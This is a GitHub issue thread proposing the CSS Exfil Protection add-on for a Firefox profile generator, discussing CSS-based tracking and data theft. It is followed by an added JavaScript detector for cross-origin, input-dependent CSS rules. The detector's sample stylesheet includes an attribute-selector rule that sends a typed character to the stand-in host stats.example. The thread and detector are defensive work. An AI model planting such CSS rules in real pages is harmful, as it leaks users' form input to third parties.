allo- / ffprofile

A tool to create firefox profiles with personalized defaults.
GNU Affero General Public License v3.0

Privacy concerned addon #235

Open CompuRoot opened 3 years ago

CompuRoot commented 3 years ago

I believe that the plugin proposed here isn't from the "cool" series, but in the same category as uMatrix & uBlock Origin, so my proposal is to add: CSS Exfil Protection (CSS Exfil Protection - in the Firefox add-ons store)

allo- commented 3 years ago

I think the addon could fit the security category. I am not sure what websites it breaks, probably, for example, websites that style an input element depending on the validity of the data the user entered.

But what is the actual problem? As far as I see, the website owner can extract data the user entered on his website. With JavaScript activated he can do this at any time. Without JavaScript this may be impossible, but still both the form and the target site from which the images are loaded need to be created by the attacker himself.

The only threat I currently can think of is extracting accidentally pasted content or sensitive data the user enters into the form and removes again when JavaScript is disabled.

The most similar issue I can think of is leaking the browser's window size using media queries. And this is an issue, because it leaks external data (resolution, panel size, browser toolbar sizes) and not data the user voluntarily enters into the website.

Do I overlook something?

CompuRoot commented 3 years ago

> Without JavaScript this may be impossible, but still both the form and the target site from which the images are loaded need to be created by the attacker himself.

That's not only about user data supplied in forms, it is also about tracking by using only CSS. Take a look at this research: https://github.com/jbtronics/CrookedStyleSheets

Even without JavaScript, CSS can do a lot of tracking, and the plugin I suggested mitigates such behaviors according to its author.

As for tests, I have used it on multiple computers in many organizations and haven't yet experienced CSS Exfil Protection breaking something online. uMatrix & uBlock Origin actually create many more problems on outdated or badly written websites.

allo- commented 3 years ago

When it works as intended, a side-effect would be, that it prevents something like

input:valid {
  background: url(valid.png);
}

Wouldn't it? Of course it breaks less than uMatrix when you don't want to unblock a lot of things first. The worry is about breakage that is unexpected and hard to tell which addon/setting is causing it. Why I am a bit careful with good descriptions and concise settings (in contrast to the large user.js files you can find everywhere), is that the generator should be as transparent as possible what you configure and which setting may be the one that breaks a feature to improve privacy.

Your second link indeed looks like there is quite a bit of tracking potential. Is there an explanation somewhere of what the addon actually does to prevent this? Your new link suggests that all images should be preloaded, but the description reads like the addon modifies the CSS instead.

CompuRoot commented 3 years ago

> When it works as intended, a side-effect would be, that it prevents something like
>
> input:valid { background: url(valid.png); }
>
> Wouldn't it?

No, the addon is smart enough to figure out whether that's an external call or a local one.

> Is there an explanation somewhere of what the addon actually does to prevent this?

Here is the official home of the suggested addon: https://github.com/mlgualtieri/CSS-Exfil-Protection

And here is a description of what it is doing: https://www.mike-gualtieri.com/posts/stealing-data-with-css-attack-and-defense
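
The local-versus-external distinction debated in this thread, as an added example that is not part of the thread and not the add-on's code: it flags only rules whose selector depends on what the user typed and whose `url()` resolves to another origin, so the `input:valid { background: url(valid.png); }` case stays untouched. The function names, the selector list and the `shop.example`, `cdn.example` and `stats.example` hosts are assumptions made for the illustration.

```javascript
// Added illustration; not the add-on's code. All names here are hypothetical.
// Selectors whose match depends on what the user typed (assumed list).
const INPUT_DEPENDENT = /:(?:valid|invalid|placeholder-shown)\b|\[\s*value\s*[\^$*~|]?=/i;
const URL_FN = /url\(\s*(?:"([^"]*)"|'([^']*)'|([^)\s]*))\s*\)/gi;

// Resolve each url() against the stylesheet's own URL and compare origins.
function remoteUrls(declarations, sheetUrl) {
  const base = new URL(sheetUrl);
  const remote = [];
  for (const m of declarations.matchAll(URL_FN)) {
    const raw = m[1] ?? m[2] ?? m[3];
    let target;
    try { target = new URL(raw, base); } catch { continue; } // unparsable: skip
    if (target.protocol === "data:") continue; // inline data, no network request
    if (target.origin !== base.origin) remote.push(target.href);
  }
  return remote;
}

// Return rules that pair an input-dependent selector with a cross-origin load.
function findSuspectRules(cssText, sheetUrl) {
  const findings = [];
  const noComments = cssText.replace(/\/\*[\s\S]*?\*\//g, "");
  for (const m of noComments.matchAll(/([^{}]+)\{([^{}]*)\}/g)) {
    const selector = m[1].trim();
    if (!INPUT_DEPENDENT.test(selector)) continue;
    const urls = remoteUrls(m[2], sheetUrl);
    if (urls.length) findings.push({ selector, urls });
  }
  return findings;
}

// Constructed sample sheet, assumed to be served from the URL passed below.
const SAMPLE_CSS = `
input:valid { background: url(valid.png); }               /* relative: same origin */
input:invalid { background: url("/img/invalid.png"); }    /* root-relative: same origin */
input:valid { background: url(//cdn.example/valid.png); } /* protocol-relative: other origin */
input[value$="x"] { background: url('https://stats.example/p?v=x'); }
.logo { background: url(https://cdn.example/logo.png); }  /* remote, but not input-dependent */
`;
const findings = findSuspectRules(SAMPLE_CSS, "https://shop.example/css/site.css");
console.log(findings);
```

Only the third and fourth rules are reported; the remote `.logo` image is ignored because its selector does not depend on user input.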